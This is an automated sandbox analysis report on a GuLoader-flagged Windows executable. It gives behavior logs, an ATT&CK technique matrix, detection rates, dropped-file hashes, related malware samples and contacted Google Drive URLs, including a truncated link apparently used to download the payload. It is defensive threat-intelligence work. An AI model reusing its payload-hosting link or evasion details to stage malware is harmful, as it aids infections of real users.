      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe Code function: 0_2_00405D68 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405D68
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 411 Process Injection | 1 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | 1 Shared Modules | Logon Script (Windows) | Logon Script (Windows) | 411 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      Source | Detection | Scanner | Label
      LMSxhK1u8Z.exe | 72% | Virustotal |
      LMSxhK1u8Z.exe | 58% | ReversingLabs | Win32.Trojan.Guloader

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\Calcifuge.exe | 58% | ReversingLabs | Win32.Trojan.Guloader

      No Antivirus matches
      No Antivirus matches

      Source | Detection | Scanner | Label
      https://www.google.comT | 0% | Avira URL Cloud | safe
      https://www.google.comZ | 0% | Avira URL Cloud | safe

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 172.217.16.206 | true | false | | high
      drive.usercontent.google.com | 172.217.16.129 | true | false | | high
00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.google.comTCalcifuge.exe, 00000006.00000003.2720820376.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1986896418.0000000005141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://drive.google.com/Calcifuge.exe, 00000006.00000003.2514842468.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2846865249.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2779106940.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801689509.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/ertificatesCalcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.google.com/j.Calcifuge.exe, 00000006.00000003.2148548358.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                          high
                                                                          https://drive.usercontent.google.com/w&Calcifuge.exe, 00000006.00000003.2571402123.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.comZCalcifuge.exe, 00000006.00000003.2332167352.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdCalcifuge.exe, 00000006.00000001.1984960895.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                              high
                                                                              https://drive.usercontent.google.com/;Calcifuge.exe, 00000006.00000002.2918740581.0000000002389000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://drive.google.com/2.Calcifuge.exe, 00000006.00000003.2171133228.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://drive.google.com/r.Calcifuge.exe, 00000006.00000003.2880880177.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://apis.google.comCalcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKACalcifuge.exe, 00000006.00000003.2685599217.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1986896418.0000000005141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://drive.google.com/_1Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://drive.google.com/ificateCalcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.16.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
172.217.16.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588662
Start date and time: 2025-01-11 03:50:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LMSxhK1u8Z.exe (renamed because original name is a hash value)
Original Sample Name: fe05b02fda8dc707ceb4143b4a2e4d6553d5410f226907cf0ae318b54edf28b2.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@6/15@2/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 76
• Number of non-executed functions: 44
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Calcifuge.exe, PID 7824 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 7360 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:51:50 | API Interceptor | 40x Sleep call for process: powershell.exe modified
21:52:31 | API Interceptor | 36x Sleep call for process: Calcifuge.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | ro7eoySJ9q.exe | malicious | GuLoader | 172.217.16.206, 172.217.16.129
 | ro7eoySJ9q.exe | malicious | GuLoader | 172.217.16.206, 172.217.16.129
 | 4NG0guPiKA.exe | malicious | GuLoader, MassLogger RAT | 172.217.16.206, 172.217.16.129
 | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.217.16.206, 172.217.16.129
 | YrCSUX2O3I.exe | malicious | GuLoader | 172.217.16.206, 172.217.16.129
 | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 172.217.16.206, 172.217.16.129
 | 4AMVusDMPP.exe | malicious | GuLoader | 172.217.16.206, 172.217.16.129
 | Cpfkf79Rzk.exe | malicious | GuLoader | 172.217.16.206, 172.217.16.129
 | TjoY7n65om.exe | malicious | Snake Keylogger | 172.217.16.206, 172.217.16.129
 | Kb94RzMYNf.exe | malicious | Snake Keylogger, VIP Keylogger | 172.217.16.206, 172.217.16.129
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):53158
                                                                                              Entropy (8bit):5.062687652912555
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                              MD5:5D430F1344CE89737902AEC47C61C930
                                                                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):1048752
                                                                                              Entropy (8bit):7.5565849180901195
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:2j+EpTNHhl/G2yQhhdR/mwmNG3Ap137dboaPjyMi76KbP:S+OT5vG2y2hvXt3IRM+i76y
                                                                                              MD5:F2827F013A265DE94993C62BF9756B00
                                                                                              SHA1:9CC4CC403434E08C9C2E2AB312980CAD6B2470CA
                                                                                              SHA-256:FE05B02FDA8DC707CEB4143B4A2E4D6553D5410F226907CF0AE318B54EDF28B2
                                                                                              SHA-512:02AF8C436750DF4E9C36CE4E93D4F263563BBC6052693441B82CC2E970FAFCA557039FAE92CEE0493ECD28D433C7C8594433421CED08F033ED8FD317B12E090B
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 58%
                                                                                              Reputation:low
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
